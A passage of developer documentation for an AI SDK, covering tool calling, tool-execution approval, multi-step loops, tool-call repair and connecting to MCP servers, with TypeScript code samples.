  if (NoObjectGeneratedError.isInstance(error)) {
    console.log('NoObjectGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Text:', error.text);
    console.log('Response:', error.response);
    console.log('Usage:', error.usage);
  }
}

More Examples

You can see structured output generation in action using various frameworks in the following examples:

`generateText` with Output

`streamText` with Output

title: Tool Calling description: Learn about tool calling and multi-step calls (using stopWhen) with AI SDK Core.

Tool Calling

As covered under Foundations, tools are objects that can be called by the model to perform a specific task. AI SDK Core tools contain several core elements:

description: An optional description of the tool that can influence when the tool is picked.
inputSchema: A Zod schema or a JSON schema that defines the input parameters. The schema is consumed by the LLM, and also used to validate the LLM tool calls.
execute: An optional async function that is called with the inputs from the tool call. It produces a value of type RESULT (generic type). It is optional because you might want to forward tool calls to the client or to a queue instead of executing them in the same process.
strict: (optional, boolean) Enables strict tool calling when supported by the provider

The tools parameter of generateText and streamText is an object that has the tool names as keys and the tools as values:

import { z } from 'zod';
import { generateText, tool, isStepCount } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: isStepCount(5),
  prompt: 'What is the weather in San Francisco?',
});

Tool calling is not restricted to only text generation. You can also use it to render user interfaces (Generative UI).

Strict Mode

By default, strict mode is disabled. You can enable it per-tool by setting strict: true:

tool({
  description: 'Get the weather in a location',
  inputSchema: z.object({
    location: z.string(),
  }),
  strict: true, // Enable strict validation for this tool
  execute: async ({ location }) => ({
    // ...
  }),
});

Input Examples

tool({
  description: 'Get the weather in a location',
  inputSchema: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  inputExamples: [
    { input: { location: 'San Francisco' } },
    { input: { location: 'London' } },
  ],
  execute: async ({ location }) => {
    // ...
  },
});

Tool Execution Approval

By default, tools with an execute function run automatically as the model calls them. You can require approval before execution in two ways:

Set needsApproval on an individual tool to define its default approval behavior
Set toolNeedsApproval on generateText or streamText to configure approval for specific tools at call time

Use needsApproval when the tool should usually require approval wherever it is used. Use toolNeedsApproval when approval depends on the specific request or runtime context. If both are provided, toolNeedsApproval takes precedence.

Tool-Level Approval with `needsApproval`

import { tool } from 'ai';
import { z } from 'zod';

const runCommand = tool({
  description: 'Run a shell command',
  inputSchema: z.object({
    command: z.string().describe('The shell command to execute'),
  }),
  needsApproval: true,
  execute: async ({ command }) => {
    // your command execution logic here
  },
});

Call-Level Approval with `toolNeedsApproval`

const result = await generateText({
  model: __MODEL__,
  tools: { runCommand },
  toolNeedsApproval: {
    runCommand: true,
  },
  prompt: 'Remove the most recent file in the downloads folder',
});

toolNeedsApproval can also be a function per tool, which lets you decide dynamically based on the tool input and runtime options such as toolCallId, messages, and context.

This is useful for tools that perform sensitive operations like executing commands, processing payments, modifying data, and more potentially dangerous actions.

How It Works

The approval requirement can come from either tool-level needsApproval or call-level toolNeedsApproval.

Here's the complete flow:

Call generateText or streamText with approval configured via needsApproval or toolNeedsApproval
The model generates a tool call
The call returns tool-approval-request parts in result.content
Your app requests approval and collects the user's decision
Add a tool-approval-response to the messages array
Call generateText or streamText again with the updated messages
If approved, the tool runs and returns a result. If denied, the model sees the denial and responds accordingly.

Handling Approval Requests

After calling generateText or streamText, check result.content for tool-approval-request parts:

import { type ModelMessage, generateText } from 'ai';

const messages: ModelMessage[] = [
  { role: 'user', content: 'Remove the most recent file' },
];
const result = await generateText({
  model: __MODEL__,
  tools: { runCommand },
  messages,
});

messages.push(...result.response.messages);

for (const part of result.content) {
  if (part.type === 'tool-approval-request') {
    console.log(part.approvalId); // Unique ID for this approval request
    console.log(part.toolCall); // Contains toolName, input, etc.
  }
}

To respond, create a tool-approval-response and add it to your messages:

import { type ToolApprovalResponse } from 'ai';

const approvals: ToolApprovalResponse[] = [];

for (const part of result.content) {
  if (part.type === 'tool-approval-request') {
    const response: ToolApprovalResponse = {
      type: 'tool-approval-response',
      approvalId: part.approvalId,
      approved: true, // or false to deny
      reason: 'User confirmed the command', // Optional context for the model
    };
    approvals.push(response);
  }
}

// add approvals to messages
messages.push({ role: 'tool', content: approvals });

Then call generateText or streamText again with the updated messages. If approved, the tool executes. If denied, the model receives the denial and can respond accordingly.

Dynamic Approval

You can make approval decisions based on tool input by providing an async function:

const paymentTool = tool({
  description: 'Process a payment',
  inputSchema: z.object({
    amount: z.number(),
    recipient: z.string(),
  }),
  needsApproval: async ({ amount }) => amount > 1000,
  execute: async ({ amount, recipient }) => {
    return await processPayment(amount, recipient);
  },
});

In this example, only transactions over $1000 require approval. Smaller transactions execute automatically.

You can use the same function shape in toolNeedsApproval when you want that decision to be defined at call time instead of on the tool itself.

Tool Execution Approval with useChat

When using useChat, the approval flow is handled through UI state. See Chatbot Tool Usage for details on handling approvals in your UI with addToolApprovalResponse.

Multi-Step Calls (using stopWhen)

The AI SDK provides several built-in stopping conditions:

isStepCount(count) — stops after a specified number of steps (default: isStepCount(20))
hasToolCall(...toolNames) — stops when any of the specified tools is called
isLoopFinished() — never triggers, letting the loop run until naturally finished

You can also combine multiple conditions in an array or create custom conditions. See Loop Control for more details.

By default, when you use generateText or streamText, it triggers a single generation. This works well for many use cases where you can rely on the model's training data to generate a response. However, when you provide tools, the model now has the choice to either generate a normal text response, or generate a tool call. If the model generates a tool call, its generation is complete and that step is finished.

Example

In the following example, there are two steps:

Step 1
1. The prompt 'What is the weather in San Francisco?' is sent to the model.
2. The model generates a tool call.
3. The tool call is executed.
Step 2
1. The tool result is sent to the model.
2. The model generates a response considering the tool result.

import { z } from 'zod';
import { generateText, tool, isStepCount } from 'ai';
__PROVIDER_IMPORT__;

const { text, steps } = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: isStepCount(5), // stop after a maximum of 5 steps if tools were called
  prompt: 'What is the weather in San Francisco?',
});

You can use streamText in a similar way.

Steps

Example: Extract tool results from all steps

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { steps } = await generateText({
  model: __MODEL__,
  stopWhen: isStepCount(10),
  // ...
});

// extract all tool calls from the steps:
const allToolCalls = steps.flatMap(step => step.toolCalls);

`onStepFinish` callback

The callback receives a stepNumber (zero-based) to identify which step just completed:

import { generateText } from 'ai';

const result = await generateText({
  // ...
  onStepFinish({
    stepNumber,
    text,
    toolCalls,
    toolResults,
    finishReason,
    usage,
  }) {
    console.log(`Step ${stepNumber} finished (${finishReason})`);
    // your own logic, e.g. for saving the chat history or recording usage
  },
});

Tool execution lifecycle callbacks

You can use experimental_onToolExecutionStart and experimental_onToolExecutionEnd to observe tool execution. These callbacks are called right before and after each tool's execute function, giving you visibility into tool execution timing, inputs, outputs, and errors:

import { generateText } from 'ai';

const result = await generateText({
  // ... model, tools, prompt
  experimental_onToolExecutionStart({ toolName, toolCallId, input }) {
    console.log(`Calling tool: ${toolName}`, { toolCallId, input });
  },
  experimental_onToolExecutionEnd({
    toolName,
    toolCallId,
    output,
    error,
    durationMs,
  }) {
    if (error) {
      console.error(`Tool ${toolName} failed after ${durationMs}ms:`, error);
    } else {
      console.log(`Tool ${toolName} completed in ${durationMs}ms`, { output });
    }
  },
});

Errors thrown inside these callbacks are silently caught and do not break the generation flow.

`prepareStep` callback

The prepareStep callback is called before a step is started.

It is called with the following parameters:

model: The model that was passed into generateText.
stopWhen: The stopping condition that was passed into generateText.
stepNumber: The number of the step that is being executed.
steps: The steps that have been executed so far.
messages: The messages that will be sent to the model for the current step.
runtimeContext: The runtime context passed via the runtimeContext setting.
toolsContext: The per-tool context map passed via the toolsContext setting.

You can use it to provide different settings for a step, including modifying the input messages.

import { generateText } from 'ai';

const result = await generateText({
  // ...
  prepareStep: async ({ model, stepNumber, steps, messages }) => {
    if (stepNumber === 0) {
      return {
        // use a different model for this step:
        model: modelForThisParticularStep,
        // force a tool choice for this step:
        toolChoice: { type: 'tool', toolName: 'tool1' },
        // limit the tools that are available for this step:
        activeTools: ['tool1'],
      };
    }

    // when nothing is returned, the default settings are used
  },
});

Message Modification for Longer Agentic Loops

In longer agentic loops, you can use the messages parameter to modify the input messages for each step. This is particularly useful for prompt compression:

prepareStep: async ({ stepNumber, steps, messages }) => {
  // Compress conversation history for longer loops
  if (messages.length > 20) {
    return {
      messages: messages.slice(-10),
    };
  }

  return {};
},

Provider Options for Step Configuration

You can use providerOptions in prepareStep to pass provider-specific configuration for each step. This is useful for features like Anthropic's code execution container persistence:

import { forwardAnthropicContainerIdFromLastStep } from '@ai-sdk/anthropic';

// Propagate container ID from previous step for code execution continuity
prepareStep: forwardAnthropicContainerIdFromLastStep,

Response Messages

Adding the generated assistant and tool messages to your conversation history is a common task, especially if you are using multi-step tool calls.

The response.messages property contains an array of ModelMessage objects that you can add to your conversation history:

import { generateText, ModelMessage } from 'ai';

const messages: ModelMessage[] = [
  // ...
];

const { response } = await generateText({
  // ...
  messages,
});

// add the response messages to your conversation history:
messages.push(...response.messages); // streamText: ...((await response).messages)

Dynamic Tools

AI SDK Core supports dynamic tools for scenarios where tool schemas are not known at compile time. This is useful for:

MCP (Model Context Protocol) tools without schemas
User-defined functions at runtime
Tools loaded from external sources

Using dynamicTool

The dynamicTool helper creates tools with unknown input/output types:

import { dynamicTool } from 'ai';
import { z } from 'zod';

const customTool = dynamicTool({
  description: 'Execute a custom function',
  inputSchema: z.object({}),
  execute: async input => {
    // input is typed as 'unknown'
    // You need to validate/cast it at runtime
    const { action, parameters } = input as any;

    // Execute your dynamic logic
    return { result: `Executed ${action}` };
  },
});

Type-Safe Handling

When using both static and dynamic tools, use the dynamic flag for type narrowing:

const result = await generateText({
  model: __MODEL__,
  tools: {
    // Static tool with known types
    weather: weatherTool,
    // Dynamic tool
    custom: dynamicTool({
      /* ... */
    }),
  },
  onStepFinish: ({ toolCalls, toolResults }) => {
    // Type-safe iteration
    for (const toolCall of toolCalls) {
      if (toolCall.dynamic) {
        // Dynamic tool: input is 'unknown'
        console.log('Dynamic:', toolCall.toolName, toolCall.input);
        continue;
      }

      // Static tool: full type inference
      switch (toolCall.toolName) {
        case 'weather':
          console.log(toolCall.input.location); // typed as string
          break;
      }
    }
  },
});

Preliminary Tool Results

You can return an AsyncIterable over multiple results. In this case, the last value from the iterable is the final tool result.

This can be used in combination with generator functions to e.g. stream status information during the tool execution:

tool({
  description: 'Get the current weather.',
  inputSchema: z.object({
    location: z.string(),
  }),
  async *execute({ location }) {
    yield {
      status: 'loading' as const,
      text: `Getting weather for ${location}`,
      weather: undefined,
    };

    await new Promise(resolve => setTimeout(resolve, 3000));

    const temperature = 72 + Math.floor(Math.random() * 21) - 10;

    yield {
      status: 'success' as const,
      text: `The weather in ${location} is ${temperature}°F`,
      temperature,
    };
  },
});

Tool Choice

You can use the toolChoice setting to influence when a tool is selected. It supports the following settings:

auto (default): the model can choose whether and which tools to call.
required: the model must call a tool. It can choose which tool to call.
none: the model must not call tools
{ type: 'tool', toolName: string (typed) }: the model must call the specified tool

import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  toolChoice: 'required', // force the model to call a tool
  prompt: 'What is the weather in San Francisco?',
});

Tool Execution Options

When tools are called, they receive additional options as a second parameter.

Tool Call ID

The ID of the tool call is forwarded to the tool execution. You can use it e.g. when sending tool-call related information with stream data.

import {
  streamText,
  tool,
  createUIMessageStream,
  createUIMessageStreamResponse,
} from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const stream = createUIMessageStream({
    execute: ({ writer }) => {
      const result = streamText({
        // ...
        messages,
        tools: {
          myTool: tool({
            // ...
            execute: async (args, { toolCallId }) => {
              // return e.g. custom status for tool call
              writer.write({
                type: 'data-tool-status',
                id: toolCallId,
                data: {
                  name: 'myTool',
                  status: 'in-progress',
                },
              });
              // ...
            },
          }),
        },
      });

      writer.merge(result.toUIMessageStream());
    },
  });

  return createUIMessageStreamResponse({ stream });
}

Messages

import { generateText, tool } from 'ai';

const result = await generateText({
  // ...
  tools: {
    myTool: tool({
      // ...
      execute: async (args, { messages }) => {
        // use the message history in e.g. calls to other language models
        return { ... };
      },
    }),
  },
});

Abort Signals

import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  abortSignal: myAbortSignal, // signal that will be forwarded to tools
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({ location: z.string() }),
      execute: async ({ location }, { abortSignal }) => {
        return fetch(
          `https://api.weatherapi.com/v1/current.json?q=${location}`,
          { signal: abortSignal }, // forward the abort signal to fetch
        );
      },
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Runtime Context

You can pass in arbitrary runtime context from generateText or streamText via the runtimeContext setting. This runtime context is available in prepareStep.

To avoid confusion with prompt context or retrieved context, the docs refer to this feature as runtime context.

This is useful for values like tenant information, feature flags, session data, or other server-side state that should influence step preparation without being embedded into the prompt.

Tool execution context is now separate. If a tool needs server-side values such as API keys, pass them via toolsContext, keyed by tool name. Each tool then receives only its own typed context value based on its contextSchema.

At a high level:

Pass shared step-level state through runtimeContext
Read or update it in prepareStep
Pass per-tool values through toolsContext
Declare each tool's expected tool context with contextSchema
Access the tool's typed context in execute together with other execution metadata such as toolCallId, messages, and abortSignal

import { openai } from '@ai-sdk/openai';
import { streamText, tool } from 'ai';
import { z } from 'zod';

const result = streamText({
  model: openai('gpt-5-mini'),
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      contextSchema: z.object({
        weatherApiKey: z.string().describe('The API key for the weather API'),
      }),
      execute: async (
        { location },
        { toolCallId, messages, abortSignal, context },
      ) => {
        const { weatherApiKey } = context;

        console.log('tool call:', toolCallId);
        console.log('messages available to tool:', messages.length);
        console.log('abortable:', abortSignal != null);
        console.log('weather tool api key:', weatherApiKey);

        return {
          location,
          temperature: 72 + Math.floor(Math.random() * 21) - 10,
        };
      },
    }),
  },
  runtimeContext: {
    somethingElse: 'other-context',
  },
  toolsContext: {
    weather: {
      weatherApiKey: 'weather-123',
    },
  },
  prepareStep: async ({ runtimeContext, toolsContext }) => {
    console.log('prepareStep runtimeContext:', runtimeContext);
    console.log('prepareStep toolsContext:', toolsContext);

    return {
      // You can keep the runtimeContext unchanged or return a new one
      // to affect the current and subsequent steps.
      runtimeContext,
    };
  },
  prompt: 'What is the weather in San Francisco?',
});

In this example, prepareStep receives the full runtime context object:

{
  somethingElse: string;
}

prepareStep also receives the per-tool toolsContext map:

{
  weather: {
    weatherApiKey: string;
  };
}

The weather tool then receives only its own typed context based on its contextSchema. In this case, execute can access weatherApiKey, while the shared step-level runtimeContext remains separate.

Tool Input Lifecycle Hooks

The following tool input lifecycle hooks are available:

onInputStart: Called when the model starts generating the input (arguments) for the tool call
onInputDelta: Called for each chunk of text as the input is streamed
onInputAvailable: Called when the complete input is available and validated

onInputStart and onInputDelta are only called in streaming contexts (when using streamText). They are not called when using generateText.

Example

import { streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const result = streamText({
  model: __MODEL__,
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
      onInputStart: () => {
        console.log('Tool call starting');
      },
      onInputDelta: ({ inputTextDelta }) => {
        console.log('Received input chunk:', inputTextDelta);
      },
      onInputAvailable: ({ input }) => {
        console.log('Complete input:', input);
      },
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Types

Modularizing your code often requires defining types to ensure type safety and reusability. To enable this, the AI SDK provides several helper types for tools, tool calls, and tool results.

You can use them to strongly type your variables, function parameters, and return types in parts of the code that are not directly related to streamText or generateText.

import { TypedToolCall, TypedToolResult, generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const myToolSet = {
  firstTool: tool({
    description: 'Greets the user',
    inputSchema: z.object({ name: z.string() }),
    execute: async ({ name }) => `Hello, ${name}!`,
  }),
  secondTool: tool({
    description: 'Tells the user their age',
    inputSchema: z.object({ age: z.number() }),
    execute: async ({ age }) => `You are ${age} years old!`,
  }),
};

type MyToolCall = TypedToolCall<typeof myToolSet>;
type MyToolResult = TypedToolResult<typeof myToolSet>;

async function generateSomething(prompt: string): Promise<{
  text: string;
  toolCalls: Array<MyToolCall>; // typed tool calls
  toolResults: Array<MyToolResult>; // typed tool results
}> {
  return generateText({
    model: __MODEL__,
    tools: myToolSet,
    prompt,
  });
}

Handling Errors

The AI SDK has three tool-call related errors:

NoSuchToolError: the model tries to call a tool that is not defined in the tools object
InvalidToolInputError: the model calls a tool with inputs that do not match the tool's input schema
ToolCallRepairError: an error that occurred during tool call repair

When tool execution fails (errors thrown by your tool's execute function), the AI SDK adds them as tool-error content parts to enable automated LLM roundtrips in multi-step scenarios.

`generateText`

try {
  const result = await generateText({
    //...
  });
} catch (error) {
  if (NoSuchToolError.isInstance(error)) {
    // handle the no such tool error
  } else if (InvalidToolInputError.isInstance(error)) {
    // handle the invalid tool inputs error
  } else {
    // handle other errors
  }
}

Tool execution errors are available in the result steps:

const { steps } = await generateText({
  // ...
});

// check for tool errors in the steps
const toolErrors = steps.flatMap(step =>
  step.content.filter(part => part.type === 'tool-error'),
);

toolErrors.forEach(toolError => {
  console.log('Tool error:', toolError.error);
  console.log('Tool name:', toolError.toolName);
  console.log('Tool input:', toolError.input);
});

`streamText`

streamText sends errors as part of the full stream. Tool execution errors appear as tool-error parts, while other errors appear as error parts.

When using toUIMessageStreamResponse, you can pass an onError function to extract the error message from the error part and forward it as part of the stream response:

const result = streamText({
  // ...
});

return result.toUIMessageStreamResponse({
  onError: error => {
    if (NoSuchToolError.isInstance(error)) {
      return 'The model tried to call a unknown tool.';
    } else if (InvalidToolInputError.isInstance(error)) {
      return 'The model called a tool with invalid inputs.';
    } else {
      return 'An unknown error occurred.';
    }
  },
});

Tool Call Repair

Language models sometimes fail to generate valid tool calls, especially when the input schema is complex or the model is smaller.

You can use the experimental_repairToolCall function to attempt to repair the tool call with a custom function.

You can use different strategies to repair the tool call:

Use a model with structured outputs to generate the inputs.
Send the messages, system prompt, and tool schema to a stronger model to generate the inputs.
Provide more specific repair instructions based on which tool was called.

Example: Use a model with structured outputs for repair

import { openai } from '@ai-sdk/openai';
import { generateText, NoSuchToolError, Output, tool } from 'ai';

const result = await generateText({
  model,
  tools,
  prompt,

  experimental_repairToolCall: async ({
    toolCall,
    tools,
    inputSchema,
    error,
  }) => {
    if (NoSuchToolError.isInstance(error)) {
      return null; // do not attempt to fix invalid tool names
    }

    const tool = tools[toolCall.toolName as keyof typeof tools];

    const { output: repairedArgs } = await generateText({
      model: __MODEL__,
      output: Output.object({ schema: tool.inputSchema }),
      prompt: [
        `The model tried to call the tool "${toolCall.toolName}"` +
          ` with the following inputs:`,
        JSON.stringify(toolCall.input),
        `The tool accepts the following schema:`,
        JSON.stringify(inputSchema(toolCall)),
        'Please fix the inputs.',
      ].join('\n'),
    });

    return { ...toolCall, input: JSON.stringify(repairedArgs) };
  },
});

Example: Use the re-ask strategy for repair

import { openai } from '@ai-sdk/openai';
import { generateText, NoSuchToolError, tool } from 'ai';

const result = await generateText({
  model,
  tools,
  prompt,

  experimental_repairToolCall: async ({
    toolCall,
    tools,
    error,
    messages,
    system,
  }) => {
    const result = await generateText({
      model,
      system,
      messages: [
        ...messages,
        {
          role: 'assistant',
          content: [
            {
              type: 'tool-call',
              toolCallId: toolCall.toolCallId,
              toolName: toolCall.toolName,
              input: toolCall.input,
            },
          ],
        },
        {
          role: 'tool' as const,
          content: [
            {
              type: 'tool-result',
              toolCallId: toolCall.toolCallId,
              toolName: toolCall.toolName,
              output: error.message,
            },
          ],
        },
      ],
      tools,
    });

    const newToolCall = result.toolCalls.find(
      newToolCall => newToolCall.toolName === toolCall.toolName,
    );

    return newToolCall != null
      ? {
          type: 'tool-call' as const,
          toolCallId: toolCall.toolCallId,
          toolName: toolCall.toolName,
          input: JSON.stringify(newToolCall.input),
        }
      : null;
  },
});

Active Tools

It is an array of tool names that are currently active. By default, the value is undefined and all tools are active.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  tools: myToolSet,
  activeTools: ['firstTool'],
});

Multi-modal Tool Results

For Google, use base64 media parts (file-data) or base64 data: URLs in URL-style parts. Remote HTTP(S) URLs in tool-result URL parts are not supported.

In order to send multi-modal tool results, e.g. screenshots, back to the model, they need to be converted into a specific format.

AI SDK Core tools have an optional toModelOutput function that converts the tool result into a content part.

Here is an example for converting a screenshot into a content part:

const result = await generateText({
  model: __MODEL__,
  tools: {
    computer: anthropic.tools.computer_20241022({
      // ...
      async execute({ action, coordinate, text }) {
        switch (action) {
          case 'screenshot': {
            return {
              type: 'image',
              data: fs
                .readFileSync('./data/screenshot-editor.png')
                .toString('base64'),
            };
          }
          default: {
            return `executed ${action}`;
          }
        }
      },

      // map to tool result content for LLM consumption:
      toModelOutput({ output }) {
        return {
          type: 'content',
          value:
            typeof output === 'string'
              ? [{ type: 'text', text: output }]
              : [{ type: 'media', data: output.data, mediaType: 'image/png' }],
        };
      },
    }),
  },
  // ...
});

Extracting Tools

Once you start having many tools, you might want to extract them into separate files. The tool helper function is crucial for this, because it ensures correct type inference.

Here is an example of an extracted tool:

import { tool } from 'ai';
import { z } from 'zod';

// the `tool` helper function ensures correct type inference:
export const weatherTool = tool({
  description: 'Get the weather in a location',
  inputSchema: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  execute: async ({ location }) => ({
    location,
    temperature: 72 + Math.floor(Math.random() * 21) - 10,
  }),
});

MCP Tools

For detailed information about MCP tools, including initialization, transport options, and usage patterns, see the MCP Tools documentation.

AI SDK Tools vs MCP Tools

Aspect	AI SDK Tools	MCP Tools
Type Safety	Full static typing end-to-end	Dynamic discovery at runtime
Execution	Same process as your request (low latency)	Separate server (network overhead)
Prompt Control	Full control over descriptions and schemas	Controlled by MCP server owner
Schema Control	You define and optimize for your model	Controlled by MCP server owner
Version Management	Full visibility over updates	Can update independently (version skew risk)
Authentication	Same process, no additional auth required	Separate server introduces additional auth complexity
Best For	Production applications requiring control and performance	Development iteration, user-provided tools

Examples

You can see tools in action using various frameworks in the following examples:

title: Model Context Protocol (MCP) description: Learn how to connect to Model Context Protocol (MCP) servers and use their tools with AI SDK Core.

Model Context Protocol (MCP)

Initializing an MCP Client

Create an MCP client using one of the following transport options:

HTTP transport (Recommended): Either configure HTTP directly via the client using transport: { type: 'http', ... }, or use MCP's official TypeScript SDK StreamableHTTPClientTransport
SSE (Server-Sent Events): An alternative HTTP-based transport
stdio: For local development only. Uses standard input/output streams for local MCP servers

HTTP Transport (Recommended)

For production deployments, we recommend using the HTTP transport. You can configure it directly on the client:

import { createMCPClient } from '@ai-sdk/mcp';

const mcpClient = await createMCPClient({
  transport: {
    type: 'http',
    url: 'https://your-server.com/mcp',

    // optional: configure HTTP headers
    headers: { Authorization: 'Bearer my-api-key' },

    // optional: provide an OAuth client provider for automatic authorization
    authProvider: myOAuthClientProvider,

    // optional: allow redirect responses (default is 'error' to prevent SSRF)
    redirect: 'follow',
  },
});

Alternatively, you can use StreamableHTTPClientTransport from MCP's official TypeScript SDK:

import { createMCPClient } from '@ai-sdk/mcp';
import { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp.js';

const url = new URL('https://your-server.com/mcp');
const mcpClient = await createMCPClient({
  transport: new StreamableHTTPClientTransport(url, {
    sessionId: 'session_123',
  }),
});

SSE Transport

SSE provides an alternative HTTP-based transport option. Configure it with a type and url property. You can also provide an authProvider for OAuth:

import { createMCPClient } from '@ai-sdk/mcp';

const mcpClient = await createMCPClient({
  transport: {
    type: 'sse',
    url: 'https://my-server.com/sse',

    // optional: configure HTTP headers
    headers: { Authorization: 'Bearer my-api-key' },

    // optional: provide an OAuth client provider for automatic authorization
    authProvider: myOAuthClientProvider,

    // optional: allow redirect responses (default is 'error' to prevent SSRF)
    redirect: 'follow',
  },
});

Stdio Transport (Local Servers)

The Stdio transport can be imported from either the MCP SDK or the AI SDK:

import { createMCPClient } from '@ai-sdk/mcp';
import { StdioClientTransport } from '@modelcontextprotocol/sdk/client/stdio.js';
// Or use the AI SDK's stdio transport:
// import { Experimental_StdioMCPTransport as StdioClientTransport } from '@ai-sdk/mcp/mcp-stdio';

const mcpClient = await createMCPClient({
  transport: new StdioClientTransport({
    command: 'node',
    args: ['src/stdio/dist/server.js'],
  }),
});

Custom Transport

You can also bring your own transport by implementing the MCPTransport interface for specific requirements not covered by the standard transports.

Authorization via OAuth is supported when using the AI SDK MCP HTTP or SSE transports by providing an authProvider.

Closing the MCP Client

After initialization, you should close the MCP client based on your usage pattern:

For short-lived usage (e.g., single requests), close the client when the response is finished
For long-running clients (e.g., command line apps), keep the client open but ensure it's closed when the application terminates

When streaming responses, you can close the client when the LLM response has finished. For example, when using streamText, you should use the onFinish callback:

const mcpClient = await createMCPClient({
  // ...
});

const tools = await mcpClient.tools();

const result = await streamText({
  model: __MODEL__,
  tools,
  prompt: 'What is the weather in Brooklyn, New York?',
  onFinish: async () => {
    await mcpClient.close();
  },
});

When generating responses without streaming, you can use try/finally or cleanup functions in your framework:

import { createMCPClient, type MCPClient } from '@ai-sdk/mcp';

let mcpClient: MCPClient | undefined;

try {
  mcpClient = await createMCPClient({
    // ...
  });
} finally {
  await mcpClient?.close();
}

Using MCP Tools

The client's tools method acts as an adapter between MCP tools and AI SDK tools. It supports two approaches for working with tool schemas:

Schema Discovery

With schema discovery, all tools offered by the server are automatically listed, and input parameter types are inferred based on the schemas provided by the server:

const tools = await mcpClient.tools();

Schema Definition

For better type safety and control, you can define the tools and their input schemas explicitly in your client code:

import { z } from 'zod';

const tools = await mcpClient.tools({
  schemas: {
    'get-data': {
      inputSchema: z.object({
        query: z.string().describe('The data query'),
        format: z.enum(['json', 'text']).optional(),
      }),
    },
    // For tools with zero inputs, you should use an empty object:
    'tool-with-no-args': {
      inputSchema: z.object({}),
    },
  },
});

Typed Tool Outputs

When MCP servers return structuredContent (per the MCP specification), you can define an outputSchema to get typed tool results:

import { z } from 'zod';

const tools = await mcpClient.tools({
  schemas: {
    'get-weather': {
      inputSchema: z.object({
        location: z.string(),
      }),
      // Define outputSchema for typed results
      outputSchema: z.object({
        temperature: z.number(),
        conditions: z.string(),
        humidity: z.number(),
      }),
    },
  },
});

const result = await tools['get-weather'].execute(
  { location: 'New York' },
  { messages: [], toolCallId: 'weather-1' },
);

console.log(`Temperature: ${result.temperature}°C`);

When outputSchema is provided:

The client extracts structuredContent from the tool result
The output is validated against your schema at runtime
You get full TypeScript type safety for the result

If the server doesn't return structuredContent, the client falls back to parsing JSON from the text content. If neither is available or validation fails, an error is thrown.

Using MCP Resources

The MCP client provides three methods for working with resources:

Listing Resources

List all available resources from the MCP server:

const resources = await mcpClient.listResources();

Reading Resource Contents

Read the contents of a specific resource by its URI:

const resourceData = await mcpClient.readResource({
  uri: 'file:///example/document.txt',
});

Listing Resource Templates

Resource templates are dynamic URI patterns that allow flexible queries. List all available templates:

const templates = await mcpClient.listResourceTemplates();

Using MCP Prompts

According to the MCP specification, prompts are user-controlled templates that servers expose for clients to list and retrieve with optional arguments.

Listing Prompts

const prompts = await mcpClient.experimental_listPrompts();

Getting a Prompt

Retrieve prompt messages, optionally passing arguments defined by the server:

const prompt = await mcpClient.experimental_getPrompt({
  name: 'code_review',
  arguments: { code: 'function add(a, b) { return a + b; }' },
});

Handling Elicitation Requests

Enabling Elicitation Support

To enable elicitation, you need to advertise the capability when creating the MCP client:

const mcpClient = await createMCPClient({
  transport: {
    type: 'sse',
    url: 'https://your-server.com/sse',
  },
  capabilities: {
    elicitation: {},
  },
});

Registering an Elicitation Handler

Use the onElicitationRequest method to register a handler that will be called when the server requests input:

import { ElicitationRequestSchema } from '@ai-sdk/mcp';

mcpClient.onElicitationRequest(ElicitationRequestSchema, async request => {
  // request.params.message: A message describing what input is needed
  // request.params.requestedSchema: JSON schema defining the expected input structure

  // Get input from the user (implement according to your application's needs)
  const userInput = await getInputFromUser(
    request.params.message,
    request.params.requestedSchema,
  );

  // Return the result with one of three actions:
  return {
    action: 'accept', // or 'decline' or 'cancel'
    content: userInput, // only required when action is 'accept'
  };
});

Elicitation Response Actions

Your handler must return an object with an action field that can be one of:

'accept': User provided the requested information. Must include content with the data.
'decline': User chose not to provide the information.
'cancel': User cancelled the operation entirely.

Examples

You can see MCP in action in the following examples:

title: Prompt Engineering description: Learn how to develop prompts with AI SDK Core.

Prompt Engineering

Tips

Prompts for Tools

When you create prompts that include tools, getting good results can be tricky as the number and complexity of your tools increases.

Here are a few tips to help you get the best results:

Use a model that is strong at tool calling, such as gpt-5 or gpt-4.1. Weaker models will often struggle to call tools effectively and flawlessly.
Keep the number of tools low, e.g. to 5 or less.
Keep the complexity of the tool parameters low. Complex Zod schemas with many nested and optional elements, unions, etc. can be challenging for the model to work with.
